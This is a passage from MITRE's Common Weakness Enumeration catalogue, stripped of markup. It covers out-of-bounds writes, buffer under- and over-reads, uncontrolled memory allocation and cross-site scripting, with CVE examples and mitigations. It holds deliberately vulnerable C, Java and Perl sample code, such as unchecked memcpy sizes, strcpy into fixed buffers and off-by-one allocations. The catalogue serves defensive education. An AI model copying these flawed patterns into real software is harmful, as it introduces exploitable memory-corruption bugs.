info is valid, return the size of usable memory, - - - * else, return -1 to indicate an error - - - */ - ... - }int main() {...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...} - - If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788). - - - This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. - - void host_lookup(char *user_supplied_addr){ - struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); - - /*routine that ensures user_supplied_addr is in the right format for conversion */ - - validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); - } - - This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker. - Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476). - - - This example applies an encoding procedure to an input string and stores it into a buffer. - - char * copy_input(char *user_supplied_string){ - int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){die("user string too long, die evil hacker!");}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){ - if( '&' == user_supplied_string[i] ){dst_buf[dst_index++] = '&';dst_buf[dst_index++] = 'a';dst_buf[dst_index++] = 'm';dst_buf[dst_index++] = 'p';dst_buf[dst_index++] = ';';}else if ('<' == user_supplied_string[i] ){ - - - /* encode to &lt; */ - - - }else dst_buf[dst_index++] = user_supplied_string[i]; - }return dst_buf; - } - - The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands. - - - In the following C/C++ example, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character. - - char* trimTrailingWhitespace(char *strMessage, int length) { - char *retMessage;char *message = malloc(sizeof(char)*(length+1)); - - // copy input string to a temporary string - char message[length+1];int index;for (index = 0; index < length; index++) {message[index] = strMessage[index];}message[index] = '\0'; - - // trim trailing whitespace - int len = index-1;while (isspace(message[len])) {message[len] = '\0';len--;} - - // return string without trailing whitespace - retMessage = message;return retMessage; - } - - However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer. - - - The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget. - - int i;unsigned int numWidgets;Widget **WidgetList; - numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets > MAX_NUM_WIDGETS)) {ExitError("Incorrect number of widgets requested!");}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf("WidgetList ptr=%p\n", WidgetList);for(i=0; i<numWidgets; i++) {WidgetList[i] = InitializeWidget();}WidgetList[numWidgets] = NULL;showWidgets(WidgetList); - - However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption. - - - The following is an example of code that may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf: - - int main() {...strncpy(destBuf, &srcBuf[find(srcBuf, ch)], 1024);...} - - If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition. - - - - - CVE-2020-0022 - chain: mobile phone Bluetooth implementation does not include offset when calculating packet length (CWE-682), leading to out-of-bounds write (CWE-787) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0022 - - - CVE-2019-1010006 - Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1010006 - - - CVE-2009-1532 - malformed inputs cause accesses of uninitialized or previously-deleted objects, leading to memory corruption - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1532 - - - CVE-2009-0269 - chain: -1 value from a function call was intended to indicate an error, but is used as an array index instead. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0269 - - - CVE-2002-2227 - Unchecked length of SSLv2 challenge value leads to buffer underflow. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2227 - - - CVE-2007-4580 - Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130) - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4580 - - - CVE-2007-4268 - Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268 - - - CVE-2009-2550 - Classic stack-based buffer overflow in media player using a long entry in a playlist - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2550 - - - CVE-2009-2403 - Heap-based buffer overflow in media player using a long entry in a playlist - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2403 - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2009-10-21 - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2014-06-23 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Description - - - CWE Content Team - MITRE - 2019-09-19 - updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Potential_Mitigations, References, Relationships, Time_of_Introduction - - - CWE Content Team - MITRE - 2020-02-24 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples - - - CWE Content Team - MITRE - 2020-08-20 - updated Alternate_Terms, Demonstrative_Examples, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples, Potential_Mitigations, Relationships - - - - - The software reads or writes to a buffer using an index or pointer that references a memory location after the end of the buffer. - This typically occurs when a pointer or its index is decremented to a position before the buffer; when pointer arithmetic results in a position before the buffer; or when a negative index is used, which generates a position before the buffer. - - - - - - - - Confidentiality - Read Memory - For an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences. - - - Integrity - Availability - Modify Memory - DoS: Crash, Exit, or Restart - Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. - - - Integrity - Modify Memory - Execute Unauthorized Code or Commands - If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow. If the attacker can overwrite a pointer's worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator. - - - - - This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. - - void host_lookup(char *user_supplied_addr){ - struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); - - /*routine that ensures user_supplied_addr is in the right format for conversion */ - - validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); - } - - This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker. - Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476). - - - In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed: - - int returnChunkSize(void *) { - - - /* if chunk info is valid, return the size of usable memory, - - - * else, return -1 to indicate an error - - - */ - ... - }int main() {...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...} - - If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788). - - - This example applies an encoding procedure to an input string and stores it into a buffer. - - char * copy_input(char *user_supplied_string){ - int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){die("user string too long, die evil hacker!");}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){ - if( '&' == user_supplied_string[i] ){dst_buf[dst_index++] = '&';dst_buf[dst_index++] = 'a';dst_buf[dst_index++] = 'm';dst_buf[dst_index++] = 'p';dst_buf[dst_index++] = ';';}else if ('<' == user_supplied_string[i] ){ - - - /* encode to &lt; */ - - - }else dst_buf[dst_index++] = user_supplied_string[i]; - }return dst_buf; - } - - The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands. - - - In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing. - - int processMessageFromSocket(int socket) { - int success; - char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE]; - - // get message from socket and store into buffer - - - //Ignoring possibliity that buffer > BUFFER_SIZE - if (getMessage(socket, buffer, BUFFER_SIZE) > 0) { - - - // place contents of the buffer into message structure - ExMessage *msg = recastBuffer(buffer); - - // copy message body into string for processing - int index;for (index = 0; index < msg->msgLength; index++) {message[index] = msg->msgBody[index];}message[index] = '\0'; - - // process message - success = processMessage(message); - }return success; - } - - However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130). - - - - - CVE-2009-2550 - Classic stack-based buffer overflow in media player using a long entry in a playlist - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2550 - - - CVE-2009-2403 - Heap-based buffer overflow in media player using a long entry in a playlist - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2403 - - - CVE-2009-0689 - large precision value in a format string triggers overflow - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0689 - - - CVE-2009-0558 - attacker-controlled array index leads to code execution - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0558 - - - CVE-2008-4113 - OS kernel trusts userland-supplied length value, allowing reading of sensitive information - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113 - - - CVE-2007-4268 - Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268 - - - - - ASCRM-CWE-788 - - - - - - - - CWE Content Team - MITRE - 2009-10-21 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-06-23 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2015-12-07 - updated Description - - - CWE Content Team - MITRE - 2017-05-03 - updated Description - - - CWE Content Team - MITRE - 2017-11-08 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples - - - - - The product allocates memory based on an untrusted, large size value, but it does not ensure that the size is within expected limits, allowing arbitrary amounts of memory to be allocated. - - - - - - - - Primary - - - Resultant - - - - - - - - - - Stack Exhaustion - When a weakness allocates excessive memory on the stack, it is often described as "stack exhaustion," which is a technical impact of the weakness. This technical impact is often encountered as a consequence of CWE-789 and/or CWE-1325. - - - - - Implementation - - - - - Availability - DoS: Resource Consumption (Memory) - Not controlling memory allocation can result in a request for too much system memory, possibly leading to a crash of the application due to out-of-memory conditions, or the consumption of a large amount of memory on the system. - - - - - Implementation - Architecture and Design - Perform adequate input validation against any value that influences the amount of memory that is allocated. Define an appropriate strategy for handling requests that exceed the limit, and consider supporting a configuration option so that the administrator can extend the amount of memory to be used if necessary. - - - Operation - Run your program using system-provided resource limits for memory. This might still cause the program to crash or exit, but the impact to the rest of the system will be minimized. - - - - - Consider the following code, which accepts an untrusted size value and allocates a buffer to contain a string of the given size. - - unsigned int size = GetUntrustedInt(); - /* ignore integer overflow (CWE-190) for this example */ - - unsigned int totBytes = size * sizeof(char);char *string = (char *)malloc(totBytes);InitializeString(string); - - Suppose an attacker provides a size value of: - - - 12345678 - - - This will cause 305,419,896 bytes (over 291 megabytes) to be allocated for the string. - - - Consider the following code, which accepts an untrusted size value and uses the size as an initial capacity for a HashMap. - - unsigned int size = GetUntrustedInt();HashMap list = new HashMap(size); - - The HashMap constructor will verify that the initial capacity is not negative, however there is no check in place to verify that sufficient memory is present. If the attacker provides a large enough value, the application will run into an OutOfMemoryError. - - - This code performs a stack allocation based on a length calculation. - - - int a = 5, b = 6; - size_t len = a - b; - char buf[len]; // Just blows up the stack - - } - - Since a and b are declared as signed ints, the "a - b" subtraction gives a negative result (-1). However, since len is declared to be unsigned, len is cast to an extremely large positive number (on 32-bit systems - 4294967295). As a result, the buffer buf[len] declaration uses an extremely large size to allocate on the stack, very likely more than the entire computer's memory space. - Miscalculations usually will not be so obvious. The calculation will either be complicated or the result of an attacker's input to attain the negative value. - - - This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function's action. - - int proc_msg(char *s, int msg_len) - { - - // Note space at the end of the string - assume all strings have preamble with space - int pre_len = sizeof("preamble: "); - char buf[pre_len - msg_len]; - ... Do processing here if we get this far - - } - char *s = "preamble: message\n"; - char *sl = strchr(s, ':'); // Number of characters up to ':' (not including space) - int jnklen = sl == NULL ? 0 : sl - s; // If undefined pointer, use zero length - int ret_val = proc_msg ("s", jnklen); // Violate assumption of preamble length, end up with negative value, blow out stack - - The buffer length ends up being -1, resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller's calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations. - - - The following code obtains an untrusted number that is used as an index into an array of messages. - - my $num = GetUntrustedNumber();my @messages = (); - $messages[$num] = "Hello World"; - - The index is not validated at all (CWE-129), so it might be possible for an attacker to modify an element in @messages that was not intended. If an index is used that is larger than the current size of the array, the Perl interpreter automatically expands the array so that the large index works. - If $num is a large value such as 2147483648 (1<<31), then the assignment to $messages[$num] would attempt to create a very large array, then eventually produce an error message such as: - Out of memory during array extend - This memory exhaustion will cause the Perl program to exit, possibly a denial of service. In addition, the lack of memory could also prevent many other programs from successfully running on the system. - - - This example shows a typical attempt to parse a string with an error resulting from a difference in assumptions between the caller to a function and the function's action. The buffer length ends up being -1 resulting in a blown out stack. The space character after the colon is included in the function calculation, but not in the caller's calculation. This, unfortunately, is not usually so obvious but exists in an obtuse series of calculations. - -int proc_msg(char *s, int msg_len) -{ -int pre_len = sizeof("preamble: "); // Note space at the end of the string - assume all strings have preamble with space -char buf[pre_len - msg_len]; -... Do processing here and set status -return status; -} - -char *s = "preamble: message\n"; -char *sl = strchr(s, ':'); // Number of characters up to ':' (not including space) -int jnklen = sl == NULL ? 0 : sl - s; // If undefined pointer, use zero length -int ret_val = proc_msg ("s", jnklen); // Violate assumption of preamble length, end up with negative value, blow out stack - - -int proc_msg(char *s, int msg_len) -{ -int pre_len = sizeof("preamble: "); // Note space at the end of the string - assume all strings have preamble with space -if (pre_len <= msg_len) { // Log error; return error_code; } -char buf[pre_len - msg_len]; -... Do processing here and set status -return status; -} - -char *s = "preamble: message\n"; -char *sl = strchr(s, ':'); // Number of characters up to ':' (not including space) -int jnklen = sl == NULL ? 0 : sl - s; // If undefined pointer, use zero length -int ret_val = proc_msg ("s", jnklen); // Violate assumption of preamble length, end up with negative value, blow out stack - - - - - - CVE-2010-3701 - program uses ::alloca() for encoding messages, but large messages trigger segfault - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3701 - - - CVE-2008-1708 - memory consumption and daemon exit by specifying a large value in a length field - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1708 - - - CVE-2008-0977 - large value in a length field leads to memory consumption and crash when no more memory is available - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0977 - - - CVE-2006-3791 - large key size in game program triggers crash when a resizing function cannot allocate enough memory - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3791 - - - CVE-2004-2589 - large Content-Length HTTP header value triggers application crash in instant messaging application due to failure in memory allocation - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2589 - - - - - 35 - SOAP Array Abuse - - - MEM35-C - Allocate sufficient memory for an object - Imprecise - - - IDS32-PL - Validate any integer that is used as an array index - Imprecise - - - ASCSM-CWE-789 - - - - - - - - This weakness can be closely associated with integer overflows (CWE-190). Integer overflow attacks would concentrate on providing an extremely large number that triggers an overflow that causes less memory to be allocated than expected. By providing a large value that does not trigger an integer overflow, the attacker could still cause excessive amounts of memory to be allocated. - - Uncontrolled memory allocation is possible in many languages, such as dynamic array allocation in perl or initial size parameters in Collections in Java. However, languages like C and C++ where programmers have the power to more directly control memory management will be more susceptible. - - - - - CWE Content Team - MITRE - 2009-10-21 - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Common_Consequences, Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Alternate_Terms, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Relationships, Time_of_Introduction - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Relationships - - Uncontrolled Memory Allocation - - - - The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. - - Cross-site scripting (XSS) vulnerabilities occur when: - - Untrusted data enters a web application, typically from a web request. - The web application dynamically generates a web page that contains this untrusted data. - During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc. - A victim visits the generated web page through a web browser, which contains malicious script that was injected using the untrusted data. - Since the script comes from a web page that was sent by the web server, the victim's web browser executes the malicious script in the context of the web server's domain. - This effectively violates the intention of the web browser's same-origin policy, which states that scripts in one domain should not be able to access resources or run code in a different domain. - - There are three main kinds of XSS: - - - Type 1: Reflected XSS (or Non-Persistent) - - The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser. - - Type 2: Stored XSS (or Persistent) - - The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs. - - - Type 0: DOM-Based XSS - - In DOM-based XSS, the client performs the injection of XSS into the page; in the other types, the server performs the injection. DOM-based XSS generally involves server-controlled, trusted script that is sent to the client, such as Javascript that performs sanity checks on a form before the user submits it. If the server-supplied script processes user-supplied data and then injects it back into the web page (such as with dynamic HTML), then DOM-based XSS is possible. - - - Once the malicious script is injected, the attacker can perform a variety of malicious activities. The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim's account on that web site. Finally, the script could exploit a vulnerability in the web browser itself possibly taking over the victim's machine, sometimes referred to as "drive-by hacking." - In many cases, the attack can be launched without the victim even being aware of it. Even with careful users, attackers frequently use a variety of methods to encode the malicious portion of the attack, such as URL encoding or Unicode, so the request looks less suspicious. - - - - - - - - - - Resultant - - - - - - - - - Same Origin Policy - The same origin policy states that browsers should limit the resources accessible to scripts running on a given web site, or "origin", to the resources associated with that web site on the client-side, and not the client-side resources of any other sites or "origins". The goal is to prevent one site from being able to modify or read the contents of an unrelated site. Since the World Wide Web involves interactions between many sites, this policy is important for browsers to enforce. - Domain - The Domain of a website when referring to XSS is roughly equivalent to the resources associated with that website on the client-side of the connection. That is, the domain can be thought of as all resources the browser is storing for the user's interactions with this particular site. - - - - - XSS - "XSS" is a common abbreviation for Cross-Site Scripting. - - - HTML Injection - "HTML injection" is used as a synonym of stored (Type 2) XSS. - - - CSS - In the early years after initial discovery of XSS, "CSS" was a commonly-used acronym. However, this would cause confusion with "Cascading Style Sheets," so usage of this acronym has declined significantly. - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Access Control - Confidentiality - Bypass Protection Mechanism - Read Application Data - The most common attack performed with cross-site scripting involves the disclosure of information stored in user cookies. Typically, a malicious user will craft a client-side script, which -- when parsed by a web browser -- performs some activity (such as sending all site cookies to a given E-mail address). This script will be loaded and run by each user visiting the web site. Since the site requesting to run the script has access to the cookies in question, the malicious script does also. - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - In some circumstances it may be possible to run arbitrary code on a victim's computer when cross-site scripting is combined with other flaws. - - - Confidentiality - Integrity - Availability - Access Control - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - Read Application Data - The consequence of an XSS attack is the same regardless of whether it is stored or reflected. The difference is in how the payload arrives at the server. XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. Some cross-site scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running "Active X" controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content. - - - - - Automated Static Analysis - Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible, especially when multiple components are involved. - Moderate - - - Black Box - Use the XSS Cheat Sheet [REF-714] or automated test-generation tools to help launch a wide variety of attacks against your web application. The Cheat Sheet contains many subtle XSS variations that are specifically targeted against weak XSS defenses. - Moderate - With Stored XSS, the indirection caused by the data store can make it more difficult to find the problem. The tester must first inject the XSS string into the data store, then find the appropriate application functionality in which the XSS string is sent to other users of the application. These are two distinct steps in which the activation of the XSS can take place minutes, hours, or days after the XSS was originally injected into the data store. - - - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket. - - - - Implementation - Architecture and Design - - Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. - For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. - Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: - - - HTML body - Element attributes (such as src="XYZ") - URIs - JavaScript sections - Cascading Style Sheets and style property - - - etc. Note that HTML Entity Encoding is only appropriate for the HTML body. - Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. - - - - Architecture and Design - Implementation - Attack Surface Reduction - Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls. - Limited - This technique has limited effectiveness, but can be helpful when it is possible to store client state and sensitive information on the server side instead of in cookies, headers, hidden form fields, etc. - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Architecture and Design - Parameterization - If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. - - - Implementation - Output Encoding - - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. - - - - Implementation - With Struts, write all data from form beans with the bean's filter attribute set to true. - - - Implementation - Attack Surface Reduction - To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. - Defense in Depth - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When dynamically constructing web pages, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. All input should be validated and cleansed, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. It is common to see data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. - Note that proper output encoding, escaping, and quoting is the most effective solution for preventing XSS, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent XSS, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, in a chat application, the heart emoticon ("<3") would likely pass the validation step, since it is commonly used. However, it cannot be directly inserted into the web page because it contains the "<" character, which would need to be escaped or otherwise handled. In this case, stripping the "<" might reduce the risk of XSS, but it would produce incorrect behavior because the 